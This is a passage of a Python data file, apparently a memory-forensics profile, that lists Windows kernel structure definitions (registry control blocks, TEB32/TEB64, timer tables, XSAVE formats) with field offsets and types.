'FlushDirtyVector' : [ 0x350, ['_RTL_BITMAP']],
'FlushOffsetArray' : [ 0x358, ['pointer', ['CMP_OFFSET_ARRAY']]],
'FlushOffsetArrayCount' : [ 0x35c, ['unsigned long']],
'FlushHiveTruncated' : [ 0x360, ['unsigned long']],
'FlushLock2' : [ 0x364, ['pointer', ['_FAST_MUTEX']]],
'SecurityLock' : [ 0x368, ['_EX_PUSH_LOCK']],
'MappedViewList' : [ 0x36c, ['_LIST_ENTRY']],
'PinnedViewList' : [ 0x374, ['_LIST_ENTRY']],
'FlushedViewList' : [ 0x37c, ['_LIST_ENTRY']],
'MappedViewCount' : [ 0x384, ['unsigned short']],
'PinnedViewCount' : [ 0x386, ['unsigned short']],
'UseCount' : [ 0x388, ['unsigned long']],
'ViewsPerHive' : [ 0x38c, ['unsigned long']],
'FileObject' : [ 0x390, ['pointer', ['_FILE_OBJECT']]],
'LastShrinkHiveSize' : [ 0x394, ['unsigned long']],
'ActualFileSize' : [ 0x398, ['_LARGE_INTEGER']],
'FileFullPath' : [ 0x3a0, ['_UNICODE_STRING']],
'FileUserName' : [ 0x3a8, ['_UNICODE_STRING']],
'HiveRootPath' : [ 0x3b0, ['_UNICODE_STRING']],
'SecurityCount' : [ 0x3b8, ['unsigned long']],
'SecurityCacheSize' : [ 0x3bc, ['unsigned long']],
'SecurityHitHint' : [ 0x3c0, ['long']],
'SecurityCache' : [ 0x3c4, ['pointer', ['_CM_KEY_SECURITY_CACHE_ENTRY']]],
'SecurityHash' : [ 0x3c8, ['array', 64, ['_LIST_ENTRY']]],
'UnloadEventCount' : [ 0x5c8, ['unsigned long']],
'UnloadEventArray' : [ 0x5cc, ['pointer', ['pointer', ['_KEVENT']]]],
'RootKcb' : [ 0x5d0, ['pointer', ['_CM_KEY_CONTROL_BLOCK']]],
'Frozen' : [ 0x5d4, ['unsigned char']],
'UnloadWorkItem' : [ 0x5d8, ['pointer', ['_CM_WORKITEM']]],
'UnloadWorkItemHolder' : [ 0x5dc, ['_CM_WORKITEM']],
'GrowOnlyMode' : [ 0x5f0, ['unsigned char']],
'GrowOffset' : [ 0x5f4, ['unsigned long']],
'KcbConvertListHead' : [ 0x5f8, ['_LIST_ENTRY']],
'KnodeConvertListHead' : [ 0x600, ['_LIST_ENTRY']],
'CellRemapArray' : [ 0x608, ['pointer', ['_CM_CELL_REMAP_BLOCK']]],
'Flags' : [ 0x60c, ['unsigned long']],
'TrustClassEntry' : [ 0x610, ['_LIST_ENTRY']],
'FlushCount' : [ 0x618, ['unsigned long']],
'CmRm' : [ 0x61c, ['pointer', ['_CM_RM']]],
'CmRmInitFailPoint' : [ 0x620, ['unsigned long']],
'CmRmInitFailStatus' : [ 0x624, ['long']],
'CreatorOwner' : [ 0x628, ['pointer', ['_KTHREAD']]],
'RundownThread' : [ 0x62c, ['pointer', ['_KTHREAD']]],
} ],
'_CM_KEY_CONTROL_BLOCK' : [ 0xa0, {
'RefCount' : [ 0x0, ['unsigned long']],
'ExtFlags' : [ 0x4, ['BitField', dict(start_bit = 0, end_bit = 16, native_type='unsigned long')]],
'PrivateAlloc' : [ 0x4, ['BitField', dict(start_bit = 16, end_bit = 17, native_type='unsigned long')]],
'Delete' : [ 0x4, ['BitField', dict(start_bit = 17, end_bit = 18, native_type='unsigned long')]],
'HiveUnloaded' : [ 0x4, ['BitField', dict(start_bit = 18, end_bit = 19, native_type='unsigned long')]],
'Decommissioned' : [ 0x4, ['BitField', dict(start_bit = 19, end_bit = 20, native_type='unsigned long')]],
'LockTablePresent' : [ 0x4, ['BitField', dict(start_bit = 20, end_bit = 21, native_type='unsigned long')]],
'TotalLevels' : [ 0x4, ['BitField', dict(start_bit = 21, end_bit = 31, native_type='unsigned long')]],
'DelayedDeref' : [ 0x8, ['BitField', dict(start_bit = 0, end_bit = 1, native_type='unsigned long')]],
'DelayedClose' : [ 0x8, ['BitField', dict(start_bit = 1, end_bit = 2, native_type='unsigned long')]],
'Parking' : [ 0x8, ['BitField', dict(start_bit = 2, end_bit = 3, native_type='unsigned long')]],
'KeyHash' : [ 0xc, ['_CM_KEY_HASH']],
'ConvKey' : [ 0xc, ['unsigned long']],
'NextHash' : [ 0x10, ['pointer', ['_CM_KEY_HASH']]],
'KeyHive' : [ 0x14, ['pointer', ['_HHIVE']]],
'KeyCell' : [ 0x18, ['unsigned long']],
'KcbPushlock' : [ 0x1c, ['_EX_PUSH_LOCK']],
'Owner' : [ 0x20, ['pointer', ['_KTHREAD']]],
'SharedCount' : [ 0x20, ['long']],
'SlotHint' : [ 0x24, ['unsigned long']],
'ParentKcb' : [ 0x28, ['pointer', ['_CM_KEY_CONTROL_BLOCK']]],
'NameBlock' : [ 0x2c, ['pointer', ['_CM_NAME_CONTROL_BLOCK']]],
'CachedSecurity' : [ 0x30, ['pointer', ['_CM_KEY_SECURITY_CACHE']]],
'ValueCache' : [ 0x34, ['_CACHED_CHILD_LIST']],
'IndexHint' : [ 0x3c, ['pointer', ['_CM_INDEX_HINT_BLOCK']]],
'HashKey' : [ 0x3c, ['unsigned long']],
'SubKeyCount' : [ 0x3c, ['unsigned long']],
'KeyBodyListHead' : [ 0x40, ['_LIST_ENTRY']],
'FreeListEntry' : [ 0x40, ['_LIST_ENTRY']],
'KeyBodyArray' : [ 0x48, ['array', 4, ['pointer', ['_CM_KEY_BODY']]]],
'KcbLastWriteTime' : [ 0x58, ['_LARGE_INTEGER']],
'KcbMaxNameLen' : [ 0x60, ['unsigned short']],
'KcbMaxValueNameLen' : [ 0x62, ['unsigned short']],
'KcbMaxValueDataLen' : [ 0x64, ['unsigned long']],
'KcbUserFlags' : [ 0x68, ['BitField', dict(start_bit = 0, end_bit = 4, native_type='unsigned long')]],
'KcbVirtControlFlags' : [ 0x68, ['BitField', dict(start_bit = 4, end_bit = 8, native_type='unsigned long')]],
'KcbDebug' : [ 0x68, ['BitField', dict(start_bit = 8, end_bit = 16, native_type='unsigned long')]],
'Flags' : [ 0x68, ['BitField', dict(start_bit = 16, end_bit = 32, native_type='unsigned long')]],
'KCBUoWListHead' : [ 0x6c, ['_LIST_ENTRY']],
'DelayQueueEntry' : [ 0x74, ['_LIST_ENTRY']],
'Stolen' : [ 0x74, ['pointer', ['unsigned char']]],
'TransKCBOwner' : [ 0x7c, ['pointer', ['_CM_TRANS']]],
'KCBLock' : [ 0x80, ['_CM_INTENT_LOCK']],
'KeyLock' : [ 0x88, ['_CM_INTENT_LOCK']],
'TransValueCache' : [ 0x90, ['_CHILD_LIST']],
'TransValueListOwner' : [ 0x98, ['pointer', ['_CM_TRANS']]],
'FullKCBName' : [ 0x9c, ['pointer', ['_UNICODE_STRING']]],
} ],
'_CM_KEY_HASH_TABLE_ENTRY' : [ 0xc, {
'Lock' : [ 0x0, ['_EX_PUSH_LOCK']],
'Owner' : [ 0x4, ['pointer', ['_KTHREAD']]],
'Entry' : [ 0x8, ['pointer', ['_CM_KEY_HASH']]],
} ],
'__unnamed_162b' : [ 0xc, {
'Failure' : [ 0x0, ['Enumeration', dict(target = 'long', choices = {0: '_None', 1: '_CmInitializeHive', 2: '_HvInitializeHive', 3: '_HvpBuildMap', 4: '_HvpBuildMapAndCopy', 5: '_HvpInitMap', 6: '_HvLoadHive', 7: '_HvpReadFileImageAndBuildMap', 8: '_HvpRecoverData', 9: '_HvpRecoverWholeHive', 10: '_HvpMapFileImageAndBuildMap', 11: '_CmpValidateHiveSecurityDescriptors', 12: '_HvpEnlistBinInMap', 13: '_CmCheckRegistry', 14: '_CmRegistryIO', 15: '_CmCheckRegistry2', 16: '_CmpCheckKey', 17: '_CmpCheckValueList', 18: '_HvCheckHive', 19: '_HvCheckBin'})]],
'Status' : [ 0x4, ['long']],
'Point' : [ 0x8, ['unsigned long']],
} ],
'__unnamed_162e' : [ 0xc, {
'Action' : [ 0x0, ['unsigned long']],
'Handle' : [ 0x4, ['pointer', ['void']]],
'Status' : [ 0x8, ['long']],
} ],
'__unnamed_1630' : [ 0x4, {
'CheckStack' : [ 0x0, ['pointer', ['void']]],
} ],
'__unnamed_1632' : [ 0x10, {
'Cell' : [ 0x0, ['unsigned long']],
'CellPoint' : [ 0x4, ['pointer', ['_CELL_DATA']]],
'RootPoint' : [ 0x8, ['pointer', ['void']]],
'Index' : [ 0xc, ['unsigned long']],
} ],
'__unnamed_1634' : [ 0x10, {
'List' : [ 0x0, ['pointer', ['_CELL_DATA']]],
'Index' : [ 0x4, ['unsigned long']],
'Cell' : [ 0x8, ['unsigned long']],
'CellPoint' : [ 0xc, ['pointer', ['_CELL_DATA']]],
} ],
'__unnamed_1638' : [ 0xc, {
'Space' : [ 0x0, ['unsigned long']],
'MapPoint' : [ 0x4, ['unsigned long']],
'BinPoint' : [ 0x8, ['pointer', ['_HBIN']]],
} ],
'__unnamed_163c' : [ 0x8, {
'Bin' : [ 0x0, ['pointer', ['_HBIN']]],
'CellPoint' : [ 0x4, ['pointer', ['_HCELL']]],
} ],
'__unnamed_163e' : [ 0x4, {
'FileOffset' : [ 0x0, ['unsigned long']],
} ],
'_HIVE_LOAD_FAILURE' : [ 0x120, {
'Hive' : [ 0x0, ['pointer', ['_HHIVE']]],
'Index' : [ 0x4, ['unsigned long']],
'RecoverableIndex' : [ 0x8, ['unsigned long']],
'Locations' : [ 0xc, ['array', 8, ['__unnamed_162b']]],
'RecoverableLocations' : [ 0x6c, ['array', 8, ['__unnamed_162b']]],
'RegistryIO' : [ 0xcc, ['__unnamed_162e']],
'CheckRegistry2' : [ 0xd8, ['__unnamed_1630']],
'CheckKey' : [ 0xdc, ['__unnamed_1632']],
'CheckValueList' : [ 0xec, ['__unnamed_1634']],
'CheckHive' : [ 0xfc, ['__unnamed_1638']],
'CheckHive1' : [ 0x108, ['__unnamed_1638']],
'CheckBin' : [ 0x114, ['__unnamed_163c']],
'RecoverData' : [ 0x11c, ['__unnamed_163e']],
} ],
'_PCW_COUNTER_DESCRIPTOR' : [ 0x8, {
'Id' : [ 0x0, ['unsigned short']],
'StructIndex' : [ 0x2, ['unsigned short']],
'Offset' : [ 0x4, ['unsigned short']],
'Size' : [ 0x6, ['unsigned short']],
} ],
'_PCW_REGISTRATION_INFORMATION' : [ 0x18, {
'Version' : [ 0x0, ['unsigned long']],
'Name' : [ 0x4, ['pointer', ['_UNICODE_STRING']]],
'CounterCount' : [ 0x8, ['unsigned long']],
'Counters' : [ 0xc, ['pointer', ['_PCW_COUNTER_DESCRIPTOR']]],
'Callback' : [ 0x10, ['pointer', ['void']]],
'CallbackContext' : [ 0x14, ['pointer', ['void']]],
} ],
'_PCW_PROCESSOR_INFO' : [ 0x80, {
'IdleTime' : [ 0x0, ['unsigned long long']],
'AvailableTime' : [ 0x8, ['unsigned long long']],
'UserTime' : [ 0x10, ['unsigned long long']],
'KernelTime' : [ 0x18, ['unsigned long long']],
'Interrupts' : [ 0x20, ['unsigned long']],
'DpcTime' : [ 0x28, ['unsigned long long']],
'InterruptTime' : [ 0x30, ['unsigned long long']],
'DpcCount' : [ 0x38, ['unsigned long']],
'DpcRate' : [ 0x3c, ['unsigned long']],
'C1Time' : [ 0x40, ['unsigned long long']],
'C2Time' : [ 0x48, ['unsigned long long']],
'C3Time' : [ 0x50, ['unsigned long long']],
'C1Transitions' : [ 0x58, ['unsigned long long']],
'C2Transitions' : [ 0x60, ['unsigned long long']],
'C3Transitions' : [ 0x68, ['unsigned long long']],
'ParkingStatus' : [ 0x70, ['unsigned long']],
'CurrentFrequency' : [ 0x74, ['unsigned long']],
'PercentMaxFrequency' : [ 0x78, ['unsigned long']],
'StateFlags' : [ 0x7c, ['unsigned long']],
} ],
'_PCW_DATA' : [ 0x8, {
'Data' : [ 0x0, ['pointer', ['void']]],
'Size' : [ 0x4, ['unsigned long']],
} ],
'_ETW_PERF_COUNTERS' : [ 0x18, {
'TotalActiveSessions' : [ 0x0, ['long']],
'TotalBufferMemoryNonPagedPool' : [ 0x4, ['long']],
'TotalBufferMemoryPagedPool' : [ 0x8, ['long']],
'TotalGuidsEnabled' : [ 0xc, ['long']],
'TotalGuidsNotEnabled' : [ 0x10, ['long']],
'TotalGuidsPreEnabled' : [ 0x14, ['long']],
} ],
'_ETW_SESSION_PERF_COUNTERS' : [ 0x18, {
'BufferMemoryPagedPool' : [ 0x0, ['long']],
'BufferMemoryNonPagedPool' : [ 0x4, ['long']],
'EventsLoggedCount' : [ 0x8, ['unsigned long long']],
'EventsLost' : [ 0x10, ['long']],
'NumConsumers' : [ 0x14, ['long']],
} ],
'_TEB32' : [ 0xfe4, {
'NtTib' : [ 0x0, ['_NT_TIB32']],
'EnvironmentPointer' : [ 0x1c, ['unsigned long']],
'ClientId' : [ 0x20, ['_CLIENT_ID32']],
'ActiveRpcHandle' : [ 0x28, ['unsigned long']],
'ThreadLocalStoragePointer' : [ 0x2c, ['unsigned long']],
'ProcessEnvironmentBlock' : [ 0x30, ['unsigned long']],
'LastErrorValue' : [ 0x34, ['unsigned long']],
'CountOfOwnedCriticalSections' : [ 0x38, ['unsigned long']],
'CsrClientThread' : [ 0x3c, ['unsigned long']],
'Win32ThreadInfo' : [ 0x40, ['unsigned long']],
'User32Reserved' : [ 0x44, ['array', 26, ['unsigned long']]],
'UserReserved' : [ 0xac, ['array', 5, ['unsigned long']]],
'WOW32Reserved' : [ 0xc0, ['unsigned long']],
'CurrentLocale' : [ 0xc4, ['unsigned long']],
'FpSoftwareStatusRegister' : [ 0xc8, ['unsigned long']],
'SystemReserved1' : [ 0xcc, ['array', 54, ['unsigned long']]],
'ExceptionCode' : [ 0x1a4, ['long']],
'ActivationContextStackPointer' : [ 0x1a8, ['unsigned long']],
'SpareBytes' : [ 0x1ac, ['array', 36, ['unsigned char']]],
'TxFsContext' : [ 0x1d0, ['unsigned long']],
'GdiTebBatch' : [ 0x1d4, ['_GDI_TEB_BATCH32']],
'RealClientId' : [ 0x6b4, ['_CLIENT_ID32']],
'GdiCachedProcessHandle' : [ 0x6bc, ['unsigned long']],
'GdiClientPID' : [ 0x6c0, ['unsigned long']],
'GdiClientTID' : [ 0x6c4, ['unsigned long']],
'GdiThreadLocalInfo' : [ 0x6c8, ['unsigned long']],
'Win32ClientInfo' : [ 0x6cc, ['array', 62, ['unsigned long']]],
'glDispatchTable' : [ 0x7c4, ['array', 233, ['unsigned long']]],
'glReserved1' : [ 0xb68, ['array', 29, ['unsigned long']]],
'glReserved2' : [ 0xbdc, ['unsigned long']],
'glSectionInfo' : [ 0xbe0, ['unsigned long']],
'glSection' : [ 0xbe4, ['unsigned long']],
'glTable' : [ 0xbe8, ['unsigned long']],
'glCurrentRC' : [ 0xbec, ['unsigned long']],
'glContext' : [ 0xbf0, ['unsigned long']],
'LastStatusValue' : [ 0xbf4, ['unsigned long']],
'StaticUnicodeString' : [ 0xbf8, ['_STRING32']],
'StaticUnicodeBuffer' : [ 0xc00, ['array', 261, ['wchar']]],
'DeallocationStack' : [ 0xe0c, ['unsigned long']],
'TlsSlots' : [ 0xe10, ['array', 64, ['unsigned long']]],
'TlsLinks' : [ 0xf10, ['LIST_ENTRY32']],
'Vdm' : [ 0xf18, ['unsigned long']],
'ReservedForNtRpc' : [ 0xf1c, ['unsigned long']],
'DbgSsReserved' : [ 0xf20, ['array', 2, ['unsigned long']]],
'HardErrorMode' : [ 0xf28, ['unsigned long']],
'Instrumentation' : [ 0xf2c, ['array', 9, ['unsigned long']]],
'ActivityId' : [ 0xf50, ['_GUID']],
'SubProcessTag' : [ 0xf60, ['unsigned long']],
'EtwLocalData' : [ 0xf64, ['unsigned long']],
'EtwTraceData' : [ 0xf68, ['unsigned long']],
'WinSockData' : [ 0xf6c, ['unsigned long']],
'GdiBatchCount' : [ 0xf70, ['unsigned long']],
'CurrentIdealProcessor' : [ 0xf74, ['_PROCESSOR_NUMBER']],
'IdealProcessorValue' : [ 0xf74, ['unsigned long']],
'ReservedPad0' : [ 0xf74, ['unsigned char']],
'ReservedPad1' : [ 0xf75, ['unsigned char']],
'ReservedPad2' : [ 0xf76, ['unsigned char']],
'IdealProcessor' : [ 0xf77, ['unsigned char']],
'GuaranteedStackBytes' : [ 0xf78, ['unsigned long']],
'ReservedForPerf' : [ 0xf7c, ['unsigned long']],
'ReservedForOle' : [ 0xf80, ['unsigned long']],
'WaitingOnLoaderLock' : [ 0xf84, ['unsigned long']],
'SavedPriorityState' : [ 0xf88, ['unsigned long']],
'SoftPatchPtr1' : [ 0xf8c, ['unsigned long']],
'ThreadPoolData' : [ 0xf90, ['unsigned long']],
'TlsExpansionSlots' : [ 0xf94, ['unsigned long']],
'MuiGeneration' : [ 0xf98, ['unsigned long']],
'IsImpersonating' : [ 0xf9c, ['unsigned long']],
'NlsCache' : [ 0xfa0, ['unsigned long']],
'pShimData' : [ 0xfa4, ['unsigned long']],
'HeapVirtualAffinity' : [ 0xfa8, ['unsigned long']],
'CurrentTransactionHandle' : [ 0xfac, ['unsigned long']],
'ActiveFrame' : [ 0xfb0, ['unsigned long']],
'FlsData' : [ 0xfb4, ['unsigned long']],
'PreferredLanguages' : [ 0xfb8, ['unsigned long']],
'UserPrefLanguages' : [ 0xfbc, ['unsigned long']],
'MergedPrefLanguages' : [ 0xfc0, ['unsigned long']],
'MuiImpersonation' : [ 0xfc4, ['unsigned long']],
'CrossTebFlags' : [ 0xfc8, ['unsigned short']],
'SpareCrossTebBits' : [ 0xfc8, ['BitField', dict(start_bit = 0, end_bit = 16, native_type='unsigned short')]],
'SameTebFlags' : [ 0xfca, ['unsigned short']],
'SafeThunkCall' : [ 0xfca, ['BitField', dict(start_bit = 0, end_bit = 1, native_type='unsigned short')]],
'InDebugPrint' : [ 0xfca, ['BitField', dict(start_bit = 1, end_bit = 2, native_type='unsigned short')]],
'HasFiberData' : [ 0xfca, ['BitField', dict(start_bit = 2, end_bit = 3, native_type='unsigned short')]],
'SkipThreadAttach' : [ 0xfca, ['BitField', dict(start_bit = 3, end_bit = 4, native_type='unsigned short')]],
'WerInShipAssertCode' : [ 0xfca, ['BitField', dict(start_bit = 4, end_bit = 5, native_type='unsigned short')]],
'RanProcessInit' : [ 0xfca, ['BitField', dict(start_bit = 5, end_bit = 6, native_type='unsigned short')]],
'ClonedThread' : [ 0xfca, ['BitField', dict(start_bit = 6, end_bit = 7, native_type='unsigned short')]],
'SuppressDebugMsg' : [ 0xfca, ['BitField', dict(start_bit = 7, end_bit = 8, native_type='unsigned short')]],
'DisableUserStackWalk' : [ 0xfca, ['BitField', dict(start_bit = 8, end_bit = 9, native_type='unsigned short')]],
'RtlExceptionAttached' : [ 0xfca, ['BitField', dict(start_bit = 9, end_bit = 10, native_type='unsigned short')]],
'InitialThread' : [ 0xfca, ['BitField', dict(start_bit = 10, end_bit = 11, native_type='unsigned short')]],
'SpareSameTebBits' : [ 0xfca, ['BitField', dict(start_bit = 11, end_bit = 16, native_type='unsigned short')]],
'TxnScopeEnterCallback' : [ 0xfcc, ['unsigned long']],
'TxnScopeExitCallback' : [ 0xfd0, ['unsigned long']],
'TxnScopeContext' : [ 0xfd4, ['unsigned long']],
'LockCount' : [ 0xfd8, ['unsigned long']],
'SpareUlong0' : [ 0xfdc, ['unsigned long']],
'ResourceRetValue' : [ 0xfe0, ['unsigned long']],
} ],
'_TEB64' : [ 0x1818, {
'NtTib' : [ 0x0, ['_NT_TIB64']],
'EnvironmentPointer' : [ 0x38, ['unsigned long long']],
'ClientId' : [ 0x40, ['_CLIENT_ID64']],
'ActiveRpcHandle' : [ 0x50, ['unsigned long long']],
'ThreadLocalStoragePointer' : [ 0x58, ['unsigned long long']],
'ProcessEnvironmentBlock' : [ 0x60, ['unsigned long long']],
'LastErrorValue' : [ 0x68, ['unsigned long']],
'CountOfOwnedCriticalSections' : [ 0x6c, ['unsigned long']],
'CsrClientThread' : [ 0x70, ['unsigned long long']],
'Win32ThreadInfo' : [ 0x78, ['unsigned long long']],
'User32Reserved' : [ 0x80, ['array', 26, ['unsigned long']]],
'UserReserved' : [ 0xe8, ['array', 5, ['unsigned long']]],
'WOW32Reserved' : [ 0x100, ['unsigned long long']],
'CurrentLocale' : [ 0x108, ['unsigned long']],
'FpSoftwareStatusRegister' : [ 0x10c, ['unsigned long']],
'SystemReserved1' : [ 0x110, ['array', 54, ['unsigned long long']]],
'ExceptionCode' : [ 0x2c0, ['long']],
'ActivationContextStackPointer' : [ 0x2c8, ['unsigned long long']],
'SpareBytes' : [ 0x2d0, ['array', 24, ['unsigned char']]],
'TxFsContext' : [ 0x2e8, ['unsigned long']],
'GdiTebBatch' : [ 0x2f0, ['_GDI_TEB_BATCH64']],
'RealClientId' : [ 0x7d8, ['_CLIENT_ID64']],
'GdiCachedProcessHandle' : [ 0x7e8, ['unsigned long long']],
'GdiClientPID' : [ 0x7f0, ['unsigned long']],
'GdiClientTID' : [ 0x7f4, ['unsigned long']],
'GdiThreadLocalInfo' : [ 0x7f8, ['unsigned long long']],
'Win32ClientInfo' : [ 0x800, ['array', 62, ['unsigned long long']]],
'glDispatchTable' : [ 0x9f0, ['array', 233, ['unsigned long long']]],
'glReserved1' : [ 0x1138, ['array', 29, ['unsigned long long']]],
'glReserved2' : [ 0x1220, ['unsigned long long']],
'glSectionInfo' : [ 0x1228, ['unsigned long long']],
'glSection' : [ 0x1230, ['unsigned long long']],
'glTable' : [ 0x1238, ['unsigned long long']],
'glCurrentRC' : [ 0x1240, ['unsigned long long']],
'glContext' : [ 0x1248, ['unsigned long long']],
'LastStatusValue' : [ 0x1250, ['unsigned long']],
'StaticUnicodeString' : [ 0x1258, ['_STRING64']],
'StaticUnicodeBuffer' : [ 0x1268, ['array', 261, ['wchar']]],
'DeallocationStack' : [ 0x1478, ['unsigned long long']],
'TlsSlots' : [ 0x1480, ['array', 64, ['unsigned long long']]],
'TlsLinks' : [ 0x1680, ['LIST_ENTRY64']],
'Vdm' : [ 0x1690, ['unsigned long long']],
'ReservedForNtRpc' : [ 0x1698, ['unsigned long long']],
'DbgSsReserved' : [ 0x16a0, ['array', 2, ['unsigned long long']]],
'HardErrorMode' : [ 0x16b0, ['unsigned long']],
'Instrumentation' : [ 0x16b8, ['array', 11, ['unsigned long long']]],
'ActivityId' : [ 0x1710, ['_GUID']],
'SubProcessTag' : [ 0x1720, ['unsigned long long']],
'EtwLocalData' : [ 0x1728, ['unsigned long long']],
'EtwTraceData' : [ 0x1730, ['unsigned long long']],
'WinSockData' : [ 0x1738, ['unsigned long long']],
'GdiBatchCount' : [ 0x1740, ['unsigned long']],
'CurrentIdealProcessor' : [ 0x1744, ['_PROCESSOR_NUMBER']],
'IdealProcessorValue' : [ 0x1744, ['unsigned long']],
'ReservedPad0' : [ 0x1744, ['unsigned char']],
'ReservedPad1' : [ 0x1745, ['unsigned char']],
'ReservedPad2' : [ 0x1746, ['unsigned char']],
'IdealProcessor' : [ 0x1747, ['unsigned char']],
'GuaranteedStackBytes' : [ 0x1748, ['unsigned long']],
'ReservedForPerf' : [ 0x1750, ['unsigned long long']],
'ReservedForOle' : [ 0x1758, ['unsigned long long']],
'WaitingOnLoaderLock' : [ 0x1760, ['unsigned long']],
'SavedPriorityState' : [ 0x1768, ['unsigned long long']],
'SoftPatchPtr1' : [ 0x1770, ['unsigned long long']],
'ThreadPoolData' : [ 0x1778, ['unsigned long long']],
'TlsExpansionSlots' : [ 0x1780, ['unsigned long long']],
'DeallocationBStore' : [ 0x1788, ['unsigned long long']],
'BStoreLimit' : [ 0x1790, ['unsigned long long']],
'MuiGeneration' : [ 0x1798, ['unsigned long']],
'IsImpersonating' : [ 0x179c, ['unsigned long']],
'NlsCache' : [ 0x17a0, ['unsigned long long']],
'pShimData' : [ 0x17a8, ['unsigned long long']],
'HeapVirtualAffinity' : [ 0x17b0, ['unsigned long']],
'CurrentTransactionHandle' : [ 0x17b8, ['unsigned long long']],
'ActiveFrame' : [ 0x17c0, ['unsigned long long']],
'FlsData' : [ 0x17c8, ['unsigned long long']],
'PreferredLanguages' : [ 0x17d0, ['unsigned long long']],
'UserPrefLanguages' : [ 0x17d8, ['unsigned long long']],
'MergedPrefLanguages' : [ 0x17e0, ['unsigned long long']],
'MuiImpersonation' : [ 0x17e8, ['unsigned long']],
'CrossTebFlags' : [ 0x17ec, ['unsigned short']],
'SpareCrossTebBits' : [ 0x17ec, ['BitField', dict(start_bit = 0, end_bit = 16, native_type='unsigned short')]],
'SameTebFlags' : [ 0x17ee, ['unsigned short']],
'SafeThunkCall' : [ 0x17ee, ['BitField', dict(start_bit = 0, end_bit = 1, native_type='unsigned short')]],
'InDebugPrint' : [ 0x17ee, ['BitField', dict(start_bit = 1, end_bit = 2, native_type='unsigned short')]],
'HasFiberData' : [ 0x17ee, ['BitField', dict(start_bit = 2, end_bit = 3, native_type='unsigned short')]],
'SkipThreadAttach' : [ 0x17ee, ['BitField', dict(start_bit = 3, end_bit = 4, native_type='unsigned short')]],
'WerInShipAssertCode' : [ 0x17ee, ['BitField', dict(start_bit = 4, end_bit = 5, native_type='unsigned short')]],
'RanProcessInit' : [ 0x17ee, ['BitField', dict(start_bit = 5, end_bit = 6, native_type='unsigned short')]],
'ClonedThread' : [ 0x17ee, ['BitField', dict(start_bit = 6, end_bit = 7, native_type='unsigned short')]],
'SuppressDebugMsg' : [ 0x17ee, ['BitField', dict(start_bit = 7, end_bit = 8, native_type='unsigned short')]],
'DisableUserStackWalk' : [ 0x17ee, ['BitField', dict(start_bit = 8, end_bit = 9, native_type='unsigned short')]],
'RtlExceptionAttached' : [ 0x17ee, ['BitField', dict(start_bit = 9, end_bit = 10, native_type='unsigned short')]],
'InitialThread' : [ 0x17ee, ['BitField', dict(start_bit = 10, end_bit = 11, native_type='unsigned short')]],
'SpareSameTebBits' : [ 0x17ee, ['BitField', dict(start_bit = 11, end_bit = 16, native_type='unsigned short')]],
'TxnScopeEnterCallback' : [ 0x17f0, ['unsigned long long']],
'TxnScopeExitCallback' : [ 0x17f8, ['unsigned long long']],
'TxnScopeContext' : [ 0x1800, ['unsigned long long']],
'LockCount' : [ 0x1808, ['unsigned long']],
'SpareUlong0' : [ 0x180c, ['unsigned long']],
'ResourceRetValue' : [ 0x1810, ['unsigned long long']],
} ],
'_KTIMER_TABLE' : [ 0x1840, {
'TimerExpiry' : [ 0x0, ['array', 16, ['pointer', ['_KTIMER']]]],
'TimerEntries' : [ 0x40, ['array', 256, ['_KTIMER_TABLE_ENTRY']]],
} ],
'_KTIMER_TABLE_ENTRY' : [ 0x18, {
'Lock' : [ 0x0, ['unsigned long']],
'Entry' : [ 0x4, ['_LIST_ENTRY']],
'Time' : [ 0x10, ['_ULARGE_INTEGER']],
} ],
'_KAFFINITY_EX' : [ 0xc, {
'Count' : [ 0x0, ['unsigned short']],
'Size' : [ 0x2, ['unsigned short']],
'Reserved' : [ 0x4, ['unsigned long']],
'Bitmap' : [ 0x8, ['array', 1, ['unsigned long']]],
} ],
'_KAFFINITY_ENUMERATION_CONTEXT' : [ 0xc, {
'Affinity' : [ 0x0, ['pointer', ['_KAFFINITY_EX']]],
'CurrentMask' : [ 0x4, ['unsigned long']],
'CurrentIndex' : [ 0x8, ['unsigned short']],
} ],
'_GROUP_AFFINITY' : [ 0xc, {
'Mask' : [ 0x0, ['unsigned long']],
'Group' : [ 0x4, ['unsigned short']],
'Reserved' : [ 0x6, ['array', 3, ['unsigned short']]],
} ],
'_XSTATE_SAVE' : [ 0x20, {
'Reserved1' : [ 0x0, ['long long']],
'Reserved2' : [ 0x8, ['unsigned long']],
'Prev' : [ 0xc, ['pointer', ['_XSTATE_SAVE']]],
'Reserved3' : [ 0x10, ['pointer', ['_XSAVE_AREA']]],
'Thread' : [ 0x14, ['pointer', ['_KTHREAD']]],
'Reserved4' : [ 0x18, ['pointer', ['void']]],
'Level' : [ 0x1c, ['unsigned char']],
'XStateContext' : [ 0x0, ['_XSTATE_CONTEXT']],
} ],
'_XSAVE_AREA' : [ 0x240, {
'LegacyState' : [ 0x0, ['_XSAVE_FORMAT']],
'Header' : [ 0x200, ['_XSAVE_AREA_HEADER']],
} ],
'_FXSAVE_FORMAT' : [ 0x1e0, {
'ControlWord' : [ 0x0, ['unsigned short']],
'StatusWord' : [ 0x2, ['unsigned short']],
'TagWord' : [ 0x4, ['unsigned short']],
'ErrorOpcode' : [ 0x6, ['unsigned short']],
'ErrorOffset' : [ 0x8, ['unsigned long']],
'ErrorSelector' : [ 0xc, ['unsigned long']],
'DataOffset' : [ 0x10, ['unsigned long']],
'DataSelector' : [ 0x14, ['unsigned long']],
'MXCsr' : [ 0x18, ['unsigned long']],
'MXCsrMask' : [ 0x1c, ['unsigned long']],
'RegisterArea' : [ 0x20, ['array', 128, ['unsigned char']]],
'Reserved3' : [ 0xa0, ['array', 128, ['unsigned char']]],
'Reserved4' : [ 0x120, ['array', 192, ['unsigned char']]],
} ],
'_FNSAVE_FORMAT' : [ 0x6c, {
'ControlWord' : [ 0x0, ['unsigned long']],
'StatusWord' : [ 0x4, ['unsigned long']],
'TagWord' : [ 0x8, ['unsigned long']],
'ErrorOffset' : [ 0xc, ['unsigned long']],
'ErrorSelector' : [ 0x10, ['unsigned long']],
'DataOffset' : [ 0x14, ['unsigned long']],
'DataSelector' : [ 0x18, ['unsigned long']],
'RegisterArea' : [ 0x1c, ['array', 80, ['unsigned char']]],
} ],
'_KSTACK_AREA' : [ 0x210, {
'FnArea' : [ 0x0, ['_FNSAVE_FORMAT']],
'NpxFrame' : [ 0x0, ['_FXSAVE_FORMAT']],
'StackControl' : [ 0x1e0, ['_KERNEL_STACK_CONTROL']],
'Cr0NpxState' : [ 0x1fc, ['unsigned long']],
'Padding' : [ 0x200, ['array', 4, ['unsigned long']]],
} ],
'_KERNEL_STACK_CONTROL' : [ 0x1c, {
